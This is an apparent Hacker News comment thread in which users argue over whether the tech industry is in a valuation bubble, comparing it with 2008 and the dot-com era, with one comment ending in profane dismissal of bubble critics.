The 2008 bubble was caused by fraud; what is the current bubble caused by? Most people are saying we are in a bubble because all of these companies that are making 0 dollars are worth extremely large amounts of money. Everybody is aware that these companies aren't making money, however, and still believes the companies are worth an insane amount of money.

If everyone is willfully deluding themselves and sees nothing wrong with it, for what reason do we believe that it will change in the future and that the bubble will pop? And the current situation is different from the 2008 crash in that people know what they are buying into (companies that don't make money) and they don't care.

34
zxcvvcxz 2 days ago 0 replies      
Let's put it this way -- if everything were fine and companies had strong fundamentals, we wouldn't need some investor to tell us otherwise.
35
daveguy 3 days ago 0 replies      
Final argument from the article: "now Trump thinks we're in a tech bubble too, so maybe it's true."

To which I say: "Even a broken clock is right twice a day."

37
dsmithatx 3 days ago 0 replies      
The truth is things probably have been overvalued for a while. Bubbles pop when enough people fear and start to sell. A good article on this would graph how many articles over time have been jumping on the tech-bubble bandwagon. Anecdotally, I've noticed a massive increase in the past few months from more respected business people.
38
jrbapna 3 days ago 0 replies      
As the rate of innovation continues to increase exponentially, these so-called "bubbles" will only grow bigger. The future will have A LOT MORE companies valued at 1000x revenue, not fewer. Think about all the new industries poised to exist just in the next decade: AR, VR, AI, bionics, space, etc. Exciting times we're living in.
39
halis 3 days ago 0 replies      
Companies get acquired now whether they've ever had a viable plan to make money or not. Sounds like a bubble to me!
40
rosalinekarr 3 days ago 0 replies      
> The valuation of $1 billion not as insane as the [$15 billion] valuation placed by Microsoft on Facebook was jaw dropping.

lol

41
beatpanda 3 days ago 0 replies      
If we're not in a bubble, we have very serious structural economic and social problems created by the tech industry that we need to solve. The (supposedly sustainable) rising tide is mostly drowning people, and if no reprieve in the form of a crash is coming, we need another solution.
42
H0n3sty 2 days ago 0 replies      
Most real estate agents, mortgage brokers, and building contractors couldn't see the real estate bubble either. It's hard to see a bubble when you're inside of it.

The tech bubble may very well outlast the US dollar bubble.

43
Xyik 3 days ago 0 replies      
Valuations have been questionable, but that alone does not mean we are in a bubble. I'd rather we looked at the amount of funding that has been raised and the amount lost to gauge whether we're in a bubble.
44
anysz 3 days ago 0 replies      
Come on Sam, these clickbait fools aren't worthy of such attention.
45
seanmcdirmid 3 days ago 0 replies      
There might not be a bubble in tech, but China is absolutely scaring me right now. If those Chinese bubbles pop, it might shake investor confidence in other sectors as well (e.g. tech).
46
sndean 3 days ago 1 reply      
As someone who's completely ignorant about this sort of thing, and about whether it's a bubble:

If it is indeed a bubble, is there anything positive that will result from it bursting?

47
anexprogrammer 3 days ago 0 replies      
It feels just like 1998, but for the fact there's enough folk memory of the dot com bust to put IPOs on ice.

I guess they don't want to risk duplicating lastminute.com

Only question is when it pops.

48
tomahunt 3 days ago 0 replies      
A Google Trends search for "bubble" might also suggest we are not in a bubble. [I find a peak around 2009]
49
ajsbae 3 days ago 0 replies      
As a college student, I wonder what implications this will have on the future job market.
50
allworknoplay 3 days ago 2 replies      
What the hell is Sam talking about? Quoting people from 2007-2008 saying we were in a bubble then as if nothing was wrong at the time? 2008/2009 was only partly insane because of tech, but it was an INSANE time: VCs were too scared to ask their LPs for cash because they knew the capital calls would fall short. Dealflow utterly halted for 6 months, and took another year after that to get back to something that felt productive. We were absolutely in a bubble then.

Using bubble-quotes from that era as evidence that we're not in a bubble now is absolutely preposterous.

51
vadym909 3 days ago 0 replies      
You just jinxed us man. Taunting Lady Luck like that? Now we're really screwed!
52
jayzalowitz 3 days ago 0 replies      
That's just like... your opinion, man...
53
jmanooch 2 days ago 2 replies      
Everyone who says we are in a bubble should come up with a systematically better way to allocate capital.

Otherwise: shut up and fuck off.

Because for all the hullabaloo about poor allocation in X or Y [Combinator] or Z company being correct, the broader premise, that the market is working out good things to do with money, is clearly somewhat proven by Silicon Valley's last decade of spend: cheap, connected, actually smart smartphones; electric cars becoming affordable; affordable reusable rockets. All of which are vastly humanly benign, as well as good ways to make money (not all of which do, but some do, e.g. phones).

So, pony up, or fuck the fuck off.
